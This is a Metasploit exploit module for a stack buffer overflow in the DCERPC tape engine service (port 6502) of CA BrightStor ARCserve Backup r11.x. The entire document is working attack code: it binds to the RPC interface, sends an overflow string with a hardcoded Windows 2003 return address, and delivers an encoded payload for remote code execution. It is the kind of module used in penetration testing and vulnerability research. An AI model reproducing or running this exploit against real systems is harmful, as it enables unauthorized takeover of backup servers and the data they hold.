require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote:: DCERPC
def initialize(info = {})
super (update_info(info,
'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow' ,
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
r11. 1 - r11. 5 . By sending a specially crafted DCERPC request, an attacker could overflow
the buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE ,
'References' =>
[
[ 'OSVDB' , '68330' ],
],
'Privileged' => true ,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread' ,
},
'Payload' =>
{
'Space' => 500 ,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e" ,
'StackAdjustment' => - 3500 ,
},
'Platform' => 'win' ,
'Targets' =>
[
[ 'BrightStor ARCserve r11.5/Windows 2003' , { 'Ret' => 0x28eb6493 } ],
],
'DisclosureDate' => 'Oct 4 2010' ,
'DefaultTarget' => 0 ))
register_options([ Opt:: RPORT ( 6502 ) ], self . class )
end
def exploit
connect
handle = dcerpc_handle( '62b93df0-8b02-11ce-876c-00805f842837' , '1.0' , 'ncacn_ip_tcp' , [datastore[ 'RPORT' ]])
print_status( "Binding to #{handle} ..." )
dcerpc_bind(handle)
print_status( "Bound to #{handle} ..." )
request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00"
request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
dcerpc.call(0x2B, request)
sploit = NDR .long( 4 )
sploit << NDR .string(rand_text_alpha_upper( 1002 ) + [target.ret].pack( 'V' ) + payload.encoded + "\x00" )
print_status( "Trying target #{target.name}..." )
begin
dcerpc_call(0x8A, sploit)
rescue Rex::Proto:: DCERPC ::Exceptions::NoResponse
end
handler
disconnect
end
end
= begin
/* opcode: 0x8A, address: 0x100707D0 */
long sub_100707D0 (
[ in ] handle_t arg_1,
[ in ] long arg_2,
[ in ][ref][string] char * arg_3
);
= end
|